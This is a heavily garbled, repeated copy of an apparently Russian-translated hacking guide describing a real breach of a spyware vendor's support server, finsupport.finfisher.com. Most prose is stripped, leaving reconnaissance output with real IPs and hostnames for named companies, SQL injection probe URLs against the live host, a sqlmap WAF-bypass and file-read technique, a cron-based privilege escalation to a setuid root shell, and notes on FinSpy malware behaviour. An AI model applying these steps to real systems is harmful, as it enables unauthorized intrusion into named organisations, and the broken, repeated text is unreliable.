Google: allinurl:"Scripts/scripts.js.php" , SQL- , . , - Apache ModSecurity , sqlmap --tamper='tamper/modsecurityversioned.py' , , PHP- ( JavaScript-) -.

, , .

. : , LFI, JavaScript-, - Location, .

finsupport . /BackOffice/ 403 Forbidden , SQL- ( ). print.php ,

https://finsupport.finfisher.com/GGI/Home/print.php?id=1 and 1=1 https://finsupport.finfisher.com/GGI/Home/print.php?id=1 and 2=1

, print.php , . ! MySQL . , magicquotes , MySQL- INTO OUTFILE . , sqlmap --file-read PHP- URL -, HTML-, PHP- HTML-, .

, , , . , .

( )

___________ < got r00t? > ----------- \ ^__^ \ (oo)\_______ (__)\ )\/\ ||----w | || || ^^^^^^^^^^^^^^^^

root 50% Linux- : Linux_Exploit_Suggester unix-privesc-check .

finsupport Debian, , unix-privesc-check :

WARNING: /etc/cron.hourly/mgmtlicensestatus is run by cron as root. The user www-data can write to /etc/cron.hourly/mgmtlicensestatus WARNING: /etc/cron.hourly/webalizer is run by cron as root. The user www-data can write to /etc/cron.hourly/webalizer

/etc/cron.hourly/webalizer :

chown root:root /path/to/my_setuid_shell chmod 04755 /path/to/my_setuid_shell

, ... . , cron . webalizer , , . , cron , , cron . ls -l /etc/localtime , 6- , webalizer , , , . , , , - , , . Root- , .



, . , , . nmap . nse- nfs-* smb-* . finsupport - -, qateam , .



, . . . :

Gamma FinSpy FinSpy C&C , C&C - , , C&C - FinFisher C&C - DDoS- Gamma Group .

Gamma , , FinSpy , , , , Twitter-.

: , GPU FinSpy-PC+Mobile-2012-07-12-Final.zip (magnet-, 38,7 ) , !



, , , . , .

1) -, Java , Flash Microsoft Office email-, . , / Java / Flash .

, , , 0day- FinSploit VUPEN , . -, . Metasploit-browser autopwn -, , , , Flash -.

2) , 95% , . : " ". , , , .



40 . , PGP- , . GitHub, : https://github.com/FinFisher .

:

Hacker News Reddit



https://www.pentesterlab.com/exercises/ http://overthewire.org/wargames/ http://www.hackthissite.org/ http://smashthestack.org/ http://www.win.tue.nl/~aeb/linux/hh/hh.html http://www.phrack.com/ http://pen-testing.sans.org/blog/2012/04/26/got-meterpreter-pivot http://www.offensive-security.com/metasploit-unleashed/PSExec_Pass_The_Hash https://securusglobal.com/community/2013/12/20/dumping-windows-credentials/ https://www.netspi.com/blog/entryid/140/resources-for-aspiring-penetration-testers ( ) https://www.corelan.be/ ( Exploit writing tutorial part 1) http://websec.wordpress.com/2010/02/22/exploiting-php-file-inclusion-overview/ http://www.dest-unreach.org/socat/

:

The Web Application Hacker's Handbook Hacking: The Art of Exploitation The Database Hacker's Handbook The Art of Software Security Assessment A Bug Hunter's Diary Underground: Tales of Hacking, Madness, and Obsession on the Electronic Frontier TCP/IP Illustrated

  C:\Documents and Settings\\Local Settings\Temp\   -     .      Dynamic forking (Process hollowing),             ,   .                  ( ,     ).        MBR    .           C:\Windows\Installer\{49FD463C-18F1-63C4-8F12-49F518F127} ,   ,  ,  (    -),    Skype   .             IP (     77.69.140.194)   22, 53, 80, 443, 4111 (  -   ). 
 
     : 
 
   40            Skype (, ,  , ,  )      (email, , VoIP)     -                          (Windows, Mac OSX  Linux) 
 
        ,   FinFisher     .     ,       ,        . 
 
       .      ,    -     -.               . 
 
        . 
 
     
 
 ,    - - ,       : 
 
          Truecrypt 7.1a .     Whonix .     Debian,           Tor.    ,  Whonix       Tor,  - ,        -.         aircrack-ng  reaver,     cantenna. 
 
          Whonix,    - ,      ,              ,   -    .      -      . 
 
 : ,        Tor.    ,   -,      -     nmap, sqlmap  nikto,       ,  Tor   .           VPS.     Tor      , ,   ,     . 
 
   
 
      fierce ,       whois-  IP-   . 
 
       Blackwater.     -     (academi.com).   : 
 
 fierce.pl -dns academi.com 67.238.84.228 email.academi.com 67.238.84.242 extranet.academi.com 67.238.84.240 mail.academi.com 67.238.84.230 secure.academi.com 67.238.84.227 vault.academi.com 54.243.51.249 www.academi.com 
 
   whois-   www.academi.com      ,     Amazon Web Service. 
 
 NetRange: 67.238.84.224 - 67.238.84.255 CIDR: 67.238.84.224/27 CustName: Blackwater USA Address: 850 Puddin Ridge Rd 
 
 whois-  academi.com  ,        ( 850 Puddin Ridge Rd ),        whois-. ,         ,      Google: 
 
 "850 Puddin Ridge Rd" inurl:ip-address-lookup "850 Puddin Ridge Rd" inurl:domaintools 
 
    IP-,   fierce.pl    ,  fierce.pl -dns -    IP-.      ,     ,   . 
 
     Google       . ,  academi.com    , -    : 
 
 54.236.143.203 careers.academi.com 67.132.195.12 academiproshop.com 67.238.84.236 te.academi.com 67.238.84.238 property.academi.com 67.238.84.241 teams.academi.com 
 
   whois-    ,  academiproshop.com     ,       . 
 
   FinFisher    finsupport.finfisher.com    whois-  finfisher.com ,       " FinFisher GmbH ".  "FinFisher GmbH" inurl:domaintools  gamma-international.de ,    finsupport.finfisher.com . 
 
  ,     . ,      ,    ,    ,       . 
 
    
 
  nmap-   IP-      .         SNMP-. 
 
       : 
 
     -,    ?    ,    ,    ,    URL  IP     .    fierce    git-,    git.companyname.come/gitweb/        .    ? ,   FTP-,            .        .    (VOIP-, IP-, ...)       .          ? 
 
 -    .  ,  ,  nmap    ,    : 
 
   -.   fierce ,       ,  test.company.com  dev.company.com    ,     .  nikto .      webserver/.svn/ , webserver/backup/ , webserver/phpinfo.php       . ,     .    WhatWeb .         ,  wpscan , CMS-Explorer  Joomscan .    ,         .    ,    .  - -      ,    ,    .         ZAP       .           .    ,       .   ,   .         ,       ,       ( ),   Google     ,         . 
 
  finsupport.finfisher.com   : 
 
    nikto .   .   .     SQL-.  WhatWeb     . WhatWeb   ,   ,    , -  ,   Gamma    ,    ?     ,   URL,     ( index.php ,   ,   ).   Scripts/scripts.js.php    Google: allinurl:"Scripts/scripts.js.php" ,    ,    ,    -. ,      ,        .            . 
 
        ,     - : "   ,      -    ,     Gamma Group... " 
    ,     ,    ,   .    : 
 
     Google: allinurl:"Scripts/scripts.js.php" ,     SQL-   ,   . ,  -  Apache ModSecurity ,    sqlmap   --tamper='tamper/modsecurityversioned.py'     ,   ,  PHP- (          JavaScript-)     -. 
 
   , ,          . 
 
      .     : , LFI,      JavaScript-,      -           Location,                 . 
 
    finsupport .    /BackOffice/  403 Forbidden ,           SQL- (    ).         print.php ,      
 
 https://finsupport.finfisher.com/GGI/Home/print.php?id=1 and 1=1 https://finsupport.finfisher.com/GGI/Home/print.php?id=1 and 2=1 
 
   ,  print.php   ,    .         !   MySQL       . ,      magicquotes ,         MySQL- INTO OUTFILE .     ,   sqlmap --file-read    PHP-   URL      -,   HTML-,         PHP-    HTML-,     . 
 
   ,  ,       ,        .           ,        . 
 
   (  ) 
 
 ___________ < got r00t? > ----------- \ ^__^ \ (oo)\_______ (__)\ )\/\ ||----w | || || ^^^^^^^^^^^^^^^^ 
 
   root  50% Linux-         : Linux_Exploit_Suggester  unix-privesc-check . 
 
  finsupport     Debian,        ,  unix-privesc-check : 
 
 WARNING: /etc/cron.hourly/mgmtlicensestatus is run by cron as root. The user www-data can write to /etc/cron.hourly/mgmtlicensestatus WARNING: /etc/cron.hourly/webalizer is run by cron as root. The user www-data can write to /etc/cron.hourly/webalizer 
 
  /etc/cron.hourly/webalizer    : 
 
 chown root:root /path/to/my_setuid_shell chmod 04755 /path/to/my_setuid_shell 
 
  ,  ... . ,   cron       .     webalizer ,  ,      . ,      cron     ,      ,         cron . ls -l /etc/localtime ,     6- ,     webalizer   ,  , ,     .    , ,    , -   ,       ,   . Root-     ,       . 
 
   
 
      ,     .           ,   ,         .       nmap    .     nse-   nfs-*   smb-* .       finsupport -    -,   qateam ,        . 
 
  
 
   ,      .   .      .   : 
 
  Gamma      FinSpy          FinSpy C&C  ,     C&C -         ,   ,        C&C -  FinFisher     C&C -    DDoS- Gamma Group . 
 
    Gamma      ,      ,      FinSpy ,     ,   ,        ,           Twitter-. 
 
 :       ,     GPU   FinSpy-PC+Mobile-2012-07-12-Final.zip (magnet-, 38,7 )   ,       ! 
 
   
 
    ,          ,   ,    .    ,    . 
 
 1)   -, Java , Flash  Microsoft Office      email-,            .   ,            / Java / Flash . 
 
      ,   ,      ,     0day-    FinSploit  VUPEN ,   .            -,       .   Metasploit-browser autopwn -, ,  ,       ,    Flash -. 
 
 2)  ,   95%   ,    .        : " ".      ,        ,      ,    . 
 
  
 
       40        .   ,     PGP-  ,      .           GitHub,    : https://github.com/FinFisher . 
 
  : 
 
 Hacker News Reddit 
 
   
 
 https://www.pentesterlab.com/exercises/ http://overthewire.org/wargames/ http://www.hackthissite.org/ http://smashthestack.org/ http://www.win.tue.nl/~aeb/linux/hh/hh.html http://www.phrack.com/ http://pen-testing.sans.org/blog/2012/04/26/got-meterpreter-pivot http://www.offensive-security.com/metasploit-unleashed/PSExec_Pass_The_Hash https://securusglobal.com/community/2013/12/20/dumping-windows-credentials/ https://www.netspi.com/blog/entryid/140/resources-for-aspiring-penetration-testers (    ) https://www.corelan.be/ (  Exploit writing tutorial part 1) http://websec.wordpress.com/2010/02/22/exploiting-php-file-inclusion-overview/ http://www.dest-unreach.org/socat/ 
 
 : 
 
 The Web Application Hacker's Handbook Hacking: The Art of Exploitation The Database Hacker's Handbook The Art of Software Security Assessment A Bug Hunter's Diary Underground: Tales of Hacking, Madness, and Obsession on the Electronic Frontier TCP/IP Illustrated 

C:\Documents and Settings\\Local Settings\Temp\ - . Dynamic forking (Process hollowing), , . ( , ). MBR . C:\Windows\Installer\{49FD463C-18F1-63C4-8F12-49F518F127} , , , ( -), Skype . IP ( 77.69.140.194) 22, 53, 80, 443, 4111 ( - ).

:

40 Skype (, , , , ) (email, , VoIP) - (Windows, Mac OSX Linux)

, FinFisher . , , .

. , - -. .

.



, - - , :

Truecrypt 7.1a . Whonix . Debian, Tor. , Whonix Tor, - , -. aircrack-ng reaver, cantenna.

Whonix, - , , , - . - .

: , Tor. , -, - nmap, sqlmap nikto, , Tor . VPS. Tor , , , .



fierce , whois- IP- .

Blackwater. - (academi.com). :

fierce.pl -dns academi.com 67.238.84.228 email.academi.com 67.238.84.242 extranet.academi.com 67.238.84.240 mail.academi.com 67.238.84.230 secure.academi.com 67.238.84.227 vault.academi.com 54.243.51.249 www.academi.com

whois- www.academi.com , Amazon Web Service.

NetRange: 67.238.84.224 - 67.238.84.255 CIDR: 67.238.84.224/27 CustName: Blackwater USA Address: 850 Puddin Ridge Rd

whois- academi.com , ( 850 Puddin Ridge Rd ), whois-. , , Google:

"850 Puddin Ridge Rd" inurl:ip-address-lookup "850 Puddin Ridge Rd" inurl:domaintools

IP-, fierce.pl , fierce.pl -dns - IP-. , , .

Google . , academi.com , - :

54.236.143.203 careers.academi.com 67.132.195.12 academiproshop.com 67.238.84.236 te.academi.com 67.238.84.238 property.academi.com 67.238.84.241 teams.academi.com

whois- , academiproshop.com , .

FinFisher finsupport.finfisher.com whois- finfisher.com , " FinFisher GmbH ". "FinFisher GmbH" inurl:domaintools gamma-international.de , finsupport.finfisher.com .

, . , , , , .



nmap- IP- . SNMP-.

:

-, ? , , , URL IP . fierce git-, git.companyname.come/gitweb/ . ? , FTP-, . . (VOIP-, IP-, ...) . ?

- . , , nmap , :

-. fierce , , test.company.com dev.company.com , . nikto . webserver/.svn/ , webserver/backup/ , webserver/phpinfo.php . , . WhatWeb . , wpscan , CMS-Explorer Joomscan . , . , . - - , , . ZAP . . , . , . , , ( ), Google , .

finsupport.finfisher.com :

nikto . . . SQL-. WhatWeb . WhatWeb , , , - , Gamma , ? , URL, ( index.php , , ). Scripts/scripts.js.php Google: allinurl:"Scripts/scripts.js.php" , , , -. , , . .

, - : " , - , Gamma Group... "
, , , . :

Google: allinurl:"Scripts/scripts.js.php" , SQL- , . , - Apache ModSecurity , sqlmap --tamper='tamper/modsecurityversioned.py' , , PHP- ( JavaScript-) -.

, , .

. : , LFI, JavaScript-, - Location, .

finsupport . /BackOffice/ 403 Forbidden , SQL- ( ). print.php ,

https://finsupport.finfisher.com/GGI/Home/print.php?id=1 and 1=1 https://finsupport.finfisher.com/GGI/Home/print.php?id=1 and 2=1

, print.php , . ! MySQL . , magicquotes , MySQL- INTO OUTFILE . , sqlmap --file-read PHP- URL -, HTML-, PHP- HTML-, .

, , , . , .

( )

___________ < got r00t? > ----------- \ ^__^ \ (oo)\_______ (__)\ )\/\ ||----w | || || ^^^^^^^^^^^^^^^^

root 50% Linux- : Linux_Exploit_Suggester unix-privesc-check .

finsupport Debian, , unix-privesc-check :

WARNING: /etc/cron.hourly/mgmtlicensestatus is run by cron as root. The user www-data can write to /etc/cron.hourly/mgmtlicensestatus WARNING: /etc/cron.hourly/webalizer is run by cron as root. The user www-data can write to /etc/cron.hourly/webalizer

/etc/cron.hourly/webalizer :

chown root:root /path/to/my_setuid_shell chmod 04755 /path/to/my_setuid_shell

, ... . , cron . webalizer , , . , cron , , cron . ls -l /etc/localtime , 6- , webalizer , , , . , , , - , , . Root- , .



, . , , . nmap . nse- nfs-* smb-* . finsupport - -, qateam , .



, . . . :

Gamma FinSpy FinSpy C&C , C&C - , , C&C - FinFisher C&C - DDoS- Gamma Group .

Gamma , , FinSpy , , , , Twitter-.

: , GPU FinSpy-PC+Mobile-2012-07-12-Final.zip (magnet-, 38,7 ) , !



, , , . , .

1) -, Java , Flash Microsoft Office email-, . , / Java / Flash .

, , , 0day- FinSploit VUPEN , . -, . Metasploit-browser autopwn -, , , , Flash -.

2) , 95% , . : " ". , , , .



40 . , PGP- , . GitHub, : https://github.com/FinFisher .

:

Hacker News Reddit



https://www.pentesterlab.com/exercises/ http://overthewire.org/wargames/ http://www.hackthissite.org/ http://smashthestack.org/ http://www.win.tue.nl/~aeb/linux/hh/hh.html http://www.phrack.com/ http://pen-testing.sans.org/blog/2012/04/26/got-meterpreter-pivot http://www.offensive-security.com/metasploit-unleashed/PSExec_Pass_The_Hash https://securusglobal.com/community/2013/12/20/dumping-windows-credentials/ https://www.netspi.com/blog/entryid/140/resources-for-aspiring-penetration-testers ( ) https://www.corelan.be/ ( Exploit writing tutorial part 1) http://websec.wordpress.com/2010/02/22/exploiting-php-file-inclusion-overview/ http://www.dest-unreach.org/socat/

:

The Web Application Hacker's Handbook Hacking: The Art of Exploitation The Database Hacker's Handbook The Art of Software Security Assessment A Bug Hunter's Diary Underground: Tales of Hacking, Madness, and Obsession on the Electronic Frontier TCP/IP Illustrated

C:\Documents and Settings\\Local Settings\Temp\ - . Dynamic forking (Process hollowing), , . ( , ). MBR . C:\Windows\Installer\{49FD463C-18F1-63C4-8F12-49F518F127} , , , ( -), Skype . IP ( 77.69.140.194) 22, 53, 80, 443, 4111 ( - ).

:

40 Skype (, , , , ) (email, , VoIP) - (Windows, Mac OSX Linux)

, FinFisher . , , .

. , - -. .

.



, - - , :

Truecrypt 7.1a . Whonix . Debian, Tor. , Whonix Tor, - , -. aircrack-ng reaver, cantenna.

Whonix, - , , , - . - .

: , Tor. , -, - nmap, sqlmap nikto, , Tor . VPS. Tor , , , .



fierce , whois- IP- .

Blackwater. - (academi.com). :

fierce.pl -dns academi.com 67.238.84.228 email.academi.com 67.238.84.242 extranet.academi.com 67.238.84.240 mail.academi.com 67.238.84.230 secure.academi.com 67.238.84.227 vault.academi.com 54.243.51.249 www.academi.com

whois- www.academi.com , Amazon Web Service.

NetRange: 67.238.84.224 - 67.238.84.255 CIDR: 67.238.84.224/27 CustName: Blackwater USA Address: 850 Puddin Ridge Rd

whois- academi.com , ( 850 Puddin Ridge Rd ), whois-. , , Google:

"850 Puddin Ridge Rd" inurl:ip-address-lookup "850 Puddin Ridge Rd" inurl:domaintools

IP-, fierce.pl , fierce.pl -dns - IP-. , , .

Google . , academi.com , - :

54.236.143.203 careers.academi.com 67.132.195.12 academiproshop.com 67.238.84.236 te.academi.com 67.238.84.238 property.academi.com 67.238.84.241 teams.academi.com

whois- , academiproshop.com , .

FinFisher finsupport.finfisher.com whois- finfisher.com , " FinFisher GmbH ". "FinFisher GmbH" inurl:domaintools gamma-international.de , finsupport.finfisher.com .

, . , , , , .



nmap- IP- . SNMP-.

:

-, ? , , , URL IP . fierce git-, git.companyname.come/gitweb/ . ? , FTP-, . . (VOIP-, IP-, ...) . ?

- . , , nmap , :

-. fierce , , test.company.com dev.company.com , . nikto . webserver/.svn/ , webserver/backup/ , webserver/phpinfo.php . , . WhatWeb . , wpscan , CMS-Explorer Joomscan . , . , . - - , , . ZAP . . , . , . , , ( ), Google , .

finsupport.finfisher.com :

nikto . . . SQL-. WhatWeb . WhatWeb , , , - , Gamma , ? , URL, ( index.php , , ). Scripts/scripts.js.php Google: allinurl:"Scripts/scripts.js.php" , , , -. , , . .

, - : " , - , Gamma Group... "
, , , . :

Google: allinurl:"Scripts/scripts.js.php" , SQL- , . , - Apache ModSecurity , sqlmap --tamper='tamper/modsecurityversioned.py' , , PHP- ( JavaScript-) -.

, , .

. : , LFI, JavaScript-, - Location, .

finsupport . /BackOffice/ 403 Forbidden , SQL- ( ). print.php ,

https://finsupport.finfisher.com/GGI/Home/print.php?id=1 and 1=1 https://finsupport.finfisher.com/GGI/Home/print.php?id=1 and 2=1

, print.php , . ! MySQL . , magicquotes , MySQL- INTO OUTFILE . , sqlmap --file-read PHP- URL -, HTML-, PHP- HTML-, .

, , , . , .

( )

___________ < got r00t? > ----------- \ ^__^ \ (oo)\_______ (__)\ )\/\ ||----w | || || ^^^^^^^^^^^^^^^^

root 50% Linux- : Linux_Exploit_Suggester unix-privesc-check .

finsupport Debian, , unix-privesc-check :

WARNING: /etc/cron.hourly/mgmtlicensestatus is run by cron as root. The user www-data can write to /etc/cron.hourly/mgmtlicensestatus WARNING: /etc/cron.hourly/webalizer is run by cron as root. The user www-data can write to /etc/cron.hourly/webalizer

/etc/cron.hourly/webalizer :

chown root:root /path/to/my_setuid_shell chmod 04755 /path/to/my_setuid_shell

, ... . , cron . webalizer , , . , cron , , cron . ls -l /etc/localtime , 6- , webalizer , , , . , , , - , , . Root- , .



, . , , . nmap . nse- nfs-* smb-* . finsupport - -, qateam , .



, . . . :

Gamma FinSpy FinSpy C&C , C&C - , , C&C - FinFisher C&C - DDoS- Gamma Group .

Gamma , , FinSpy , , , , Twitter-.

: , GPU FinSpy-PC+Mobile-2012-07-12-Final.zip (magnet-, 38,7 ) , !



, , , . , .

1) -, Java , Flash Microsoft Office email-, . , / Java / Flash .

, , , 0day- FinSploit VUPEN , . -, . Metasploit-browser autopwn -, , , , Flash -.

2) , 95% , . : " ". , , , .



40 . , PGP- , . GitHub, : https://github.com/FinFisher .

:

Hacker News Reddit



https://www.pentesterlab.com/exercises/ http://overthewire.org/wargames/ http://www.hackthissite.org/ http://smashthestack.org/ http://www.win.tue.nl/~aeb/linux/hh/hh.html http://www.phrack.com/ http://pen-testing.sans.org/blog/2012/04/26/got-meterpreter-pivot http://www.offensive-security.com/metasploit-unleashed/PSExec_Pass_The_Hash https://securusglobal.com/community/2013/12/20/dumping-windows-credentials/ https://www.netspi.com/blog/entryid/140/resources-for-aspiring-penetration-testers ( ) https://www.corelan.be/ ( Exploit writing tutorial part 1) http://websec.wordpress.com/2010/02/22/exploiting-php-file-inclusion-overview/ http://www.dest-unreach.org/socat/

:

The Web Application Hacker's Handbook Hacking: The Art of Exploitation The Database Hacker's Handbook The Art of Software Security Assessment A Bug Hunter's Diary Underground: Tales of Hacking, Madness, and Obsession on the Electronic Frontier TCP/IP Illustrated

C:\Documents and Settings\\Local Settings\Temp\ - . Dynamic forking (Process hollowing), , . ( , ). MBR . C:\Windows\Installer\{49FD463C-18F1-63C4-8F12-49F518F127} , , , ( -), Skype . IP ( 77.69.140.194) 22, 53, 80, 443, 4111 ( - ).

:

40 Skype (, , , , ) (email, , VoIP) - (Windows, Mac OSX Linux)

, FinFisher . , , .

. , - -. .

.



, - - , :

Truecrypt 7.1a . Whonix . Debian, Tor. , Whonix Tor, - , -. aircrack-ng reaver, cantenna.

Whonix, - , , , - . - .

: , Tor. , -, - nmap, sqlmap nikto, , Tor . VPS. Tor , , , .



fierce , whois- IP- .

Blackwater. - (academi.com). :

fierce.pl -dns academi.com 67.238.84.228 email.academi.com 67.238.84.242 extranet.academi.com 67.238.84.240 mail.academi.com 67.238.84.230 secure.academi.com 67.238.84.227 vault.academi.com 54.243.51.249 www.academi.com

whois- www.academi.com , Amazon Web Service.

NetRange: 67.238.84.224 - 67.238.84.255 CIDR: 67.238.84.224/27 CustName: Blackwater USA Address: 850 Puddin Ridge Rd

whois- academi.com , ( 850 Puddin Ridge Rd ), whois-. , , Google:

"850 Puddin Ridge Rd" inurl:ip-address-lookup "850 Puddin Ridge Rd" inurl:domaintools

IP-, fierce.pl , fierce.pl -dns - IP-. , , .

Google . , academi.com , - :

54.236.143.203 careers.academi.com 67.132.195.12 academiproshop.com 67.238.84.236 te.academi.com 67.238.84.238 property.academi.com 67.238.84.241 teams.academi.com

whois- , academiproshop.com , .

FinFisher finsupport.finfisher.com whois- finfisher.com , " FinFisher GmbH ". "FinFisher GmbH" inurl:domaintools gamma-international.de , finsupport.finfisher.com .

, . , , , , .



nmap- IP- . SNMP-.

:

-, ? , , , URL IP . fierce git-, git.companyname.come/gitweb/ . ? , FTP-, . . (VOIP-, IP-, ...) . ?

- . , , nmap , :

-. fierce , , test.company.com dev.company.com , . nikto . webserver/.svn/ , webserver/backup/ , webserver/phpinfo.php . , . WhatWeb . , wpscan , CMS-Explorer Joomscan . , . , . - - , , . ZAP . . , . , . , , ( ), Google , .

finsupport.finfisher.com :

nikto . . . SQL-. WhatWeb . WhatWeb , , , - , Gamma , ? , URL, ( index.php , , ). Scripts/scripts.js.php Google: allinurl:"Scripts/scripts.js.php" , , , -. , , . .

, - : " , - , Gamma Group... "
, , , . :

Google: allinurl:"Scripts/scripts.js.php" , SQL- , . , - Apache ModSecurity , sqlmap --tamper='tamper/modsecurityversioned.py' , , PHP- ( JavaScript-) -.

, , .

. : , LFI, JavaScript-, - Location, .

finsupport . /BackOffice/ 403 Forbidden , SQL- ( ). print.php ,

https://finsupport.finfisher.com/GGI/Home/print.php?id=1 and 1=1 https://finsupport.finfisher.com/GGI/Home/print.php?id=1 and 2=1

, print.php , . ! MySQL . , magicquotes , MySQL- INTO OUTFILE . , sqlmap --file-read PHP- URL -, HTML-, PHP- HTML-, .

, , , . , .

( )

___________ < got r00t? > ----------- \ ^__^ \ (oo)\_______ (__)\ )\/\ ||----w | || || ^^^^^^^^^^^^^^^^

root 50% Linux- : Linux_Exploit_Suggester unix-privesc-check .

finsupport Debian, , unix-privesc-check :

WARNING: /etc/cron.hourly/mgmtlicensestatus is run by cron as root. The user www-data can write to /etc/cron.hourly/mgmtlicensestatus WARNING: /etc/cron.hourly/webalizer is run by cron as root. The user www-data can write to /etc/cron.hourly/webalizer

/etc/cron.hourly/webalizer :

chown root:root /path/to/my_setuid_shell chmod 04755 /path/to/my_setuid_shell

, ... . , cron . webalizer , , . , cron , , cron . ls -l /etc/localtime , 6- , webalizer , , , . , , , - , , . Root- , .



, . , , . nmap . nse- nfs-* smb-* . finsupport - -, qateam , .



, . . . :

Gamma FinSpy FinSpy C&C , C&C - , , C&C - FinFisher C&C - DDoS- Gamma Group .

Gamma , , FinSpy , , , , Twitter-.

: , GPU FinSpy-PC+Mobile-2012-07-12-Final.zip (magnet-, 38,7 ) , !



, , , . , .

1) -, Java , Flash Microsoft Office email-, . , / Java / Flash .

, , , 0day- FinSploit VUPEN , . -, . Metasploit-browser autopwn -, , , , Flash -.

2) , 95% , . : " ". , , , .



40 . , PGP- , . GitHub, : https://github.com/FinFisher .

:

Hacker News Reddit



https://www.pentesterlab.com/exercises/ http://overthewire.org/wargames/ http://www.hackthissite.org/ http://smashthestack.org/ http://www.win.tue.nl/~aeb/linux/hh/hh.html http://www.phrack.com/ http://pen-testing.sans.org/blog/2012/04/26/got-meterpreter-pivot http://www.offensive-security.com/metasploit-unleashed/PSExec_Pass_The_Hash https://securusglobal.com/community/2013/12/20/dumping-windows-credentials/ https://www.netspi.com/blog/entryid/140/resources-for-aspiring-penetration-testers ( ) https://www.corelan.be/ ( Exploit writing tutorial part 1) http://websec.wordpress.com/2010/02/22/exploiting-php-file-inclusion-overview/ http://www.dest-unreach.org/socat/

:

The Web Application Hacker's Handbook Hacking: The Art of Exploitation The Database Hacker's Handbook The Art of Software Security Assessment A Bug Hunter's Diary Underground: Tales of Hacking, Madness, and Obsession on the Electronic Frontier TCP/IP Illustrated

1. C:\Documents and Settings\\Local Settings\Temp\ - . Dynamic forking (Process hollowing), , . ( , ). MBR . C:\Windows\Installer\{49FD463C-18F1-63C4-8F12-49F518F127} , , , ( -), Skype . IP ( 77.69.140.194) 22, 53, 80, 443, 4111 ( - ).

:

40 Skype (, , , , ) (email, , VoIP) - (Windows, Mac OSX Linux)

, FinFisher . , , .

. , - -. .

.



, - - , :

Truecrypt 7.1a . Whonix . Debian, Tor. , Whonix Tor, - , -. aircrack-ng reaver, cantenna.

Whonix, - , , , - . - .

: , Tor. , -, - nmap, sqlmap nikto, , Tor . VPS. Tor , , , .



fierce , whois- IP- .

Blackwater. - (academi.com). :

fierce.pl -dns academi.com 67.238.84.228 email.academi.com 67.238.84.242 extranet.academi.com 67.238.84.240 mail.academi.com 67.238.84.230 secure.academi.com 67.238.84.227 vault.academi.com 54.243.51.249 www.academi.com

whois- www.academi.com , Amazon Web Service.

NetRange: 67.238.84.224 - 67.238.84.255 CIDR: 67.238.84.224/27 CustName: Blackwater USA Address: 850 Puddin Ridge Rd

whois- academi.com , ( 850 Puddin Ridge Rd ), whois-. , , Google:

"850 Puddin Ridge Rd" inurl:ip-address-lookup "850 Puddin Ridge Rd" inurl:domaintools

IP-, fierce.pl , fierce.pl -dns - IP-. , , .

Google . , academi.com , - :

54.236.143.203 careers.academi.com 67.132.195.12 academiproshop.com 67.238.84.236 te.academi.com 67.238.84.238 property.academi.com 67.238.84.241 teams.academi.com

whois- , academiproshop.com , .

FinFisher finsupport.finfisher.com whois- finfisher.com , " FinFisher GmbH ". "FinFisher GmbH" inurl:domaintools gamma-international.de , finsupport.finfisher.com .

, . , , , , .



nmap- IP- . SNMP-.

:

-, ? , , , URL IP . fierce git-, git.companyname.come/gitweb/ . ? , FTP-, . . (VOIP-, IP-, ...) . ?

- . , , nmap , :

-. fierce , , test.company.com dev.company.com , . nikto . webserver/.svn/ , webserver/backup/ , webserver/phpinfo.php . , . WhatWeb . , wpscan , CMS-Explorer Joomscan . , . , . - - , , . ZAP . . , . , . , , ( ), Google , .

finsupport.finfisher.com :

nikto . . . SQL-. WhatWeb . WhatWeb , , , - , Gamma , ? , URL, ( index.php , , ). Scripts/scripts.js.php Google: allinurl:"Scripts/scripts.js.php" , , , -. , , . .

, - : " , - , Gamma Group... "
, , , . :

Google: allinurl:"Scripts/scripts.js.php" , SQL- , . , - Apache ModSecurity , sqlmap --tamper='tamper/modsecurityversioned.py' , , PHP- ( JavaScript-) -.

, , .

. : , LFI, JavaScript-, - Location, .

finsupport . /BackOffice/ 403 Forbidden , SQL- ( ). print.php ,

https://finsupport.finfisher.com/GGI/Home/print.php?id=1 and 1=1 https://finsupport.finfisher.com/GGI/Home/print.php?id=1 and 2=1

, print.php , . ! MySQL . , magicquotes , MySQL- INTO OUTFILE . , sqlmap --file-read PHP- URL -, HTML-, PHP- HTML-, .

, , , . , .

( )

___________ < got r00t? > ----------- \ ^__^ \ (oo)\_______ (__)\ )\/\ ||----w | || || ^^^^^^^^^^^^^^^^

root 50% Linux- : Linux_Exploit_Suggester unix-privesc-check .

finsupport Debian, , unix-privesc-check :

WARNING: /etc/cron.hourly/mgmtlicensestatus is run by cron as root. The user www-data can write to /etc/cron.hourly/mgmtlicensestatus WARNING: /etc/cron.hourly/webalizer is run by cron as root. The user www-data can write to /etc/cron.hourly/webalizer

/etc/cron.hourly/webalizer :

chown root:root /path/to/my_setuid_shell chmod 04755 /path/to/my_setuid_shell

, ... . , cron . webalizer , , . , cron , , cron . ls -l /etc/localtime , 6- , webalizer , , , . , , , - , , . Root- , .



, . , , . nmap . nse- nfs-* smb-* . finsupport - -, qateam , .



, . . . :

Gamma FinSpy FinSpy C&C , C&C - , , C&C - FinFisher C&C - DDoS- Gamma Group .

Gamma , , FinSpy , , , , Twitter-.

: , GPU FinSpy-PC+Mobile-2012-07-12-Final.zip (magnet-, 38,7 ) , !



, , , . , .

1) -, Java , Flash Microsoft Office email-, . , / Java / Flash .

, , , 0day- FinSploit VUPEN , . -, . Metasploit-browser autopwn -, , , , Flash -.

2) , 95% , . : " ". , , , .



40 . , PGP- , . GitHub, : https://github.com/FinFisher .

:

Hacker News Reddit



https://www.pentesterlab.com/exercises/ http://overthewire.org/wargames/ http://www.hackthissite.org/ http://smashthestack.org/ http://www.win.tue.nl/~aeb/linux/hh/hh.html http://www.phrack.com/ http://pen-testing.sans.org/blog/2012/04/26/got-meterpreter-pivot http://www.offensive-security.com/metasploit-unleashed/PSExec_Pass_The_Hash https://securusglobal.com/community/2013/12/20/dumping-windows-credentials/ https://www.netspi.com/blog/entryid/140/resources-for-aspiring-penetration-testers ( ) https://www.corelan.be/ ( Exploit writing tutorial part 1) http://websec.wordpress.com/2010/02/22/exploiting-php-file-inclusion-overview/ http://www.dest-unreach.org/socat/

:

The Web Application Hacker's Handbook Hacking: The Art of Exploitation The Database Hacker's Handbook The Art of Software Security Assessment A Bug Hunter's Diary Underground: Tales of Hacking, Madness, and Obsession on the Electronic Frontier TCP/IP Illustrated
2. C:\Documents and Settings\\Local Settings\Temp\ - . Dynamic forking (Process hollowing), , . ( , ). MBR . C:\Windows\Installer\{49FD463C-18F1-63C4-8F12-49F518F127} , , , ( -), Skype . IP ( 77.69.140.194) 22, 53, 80, 443, 4111 ( - ).

:

40 Skype (, , , , ) (email, , VoIP) - (Windows, Mac OSX Linux)

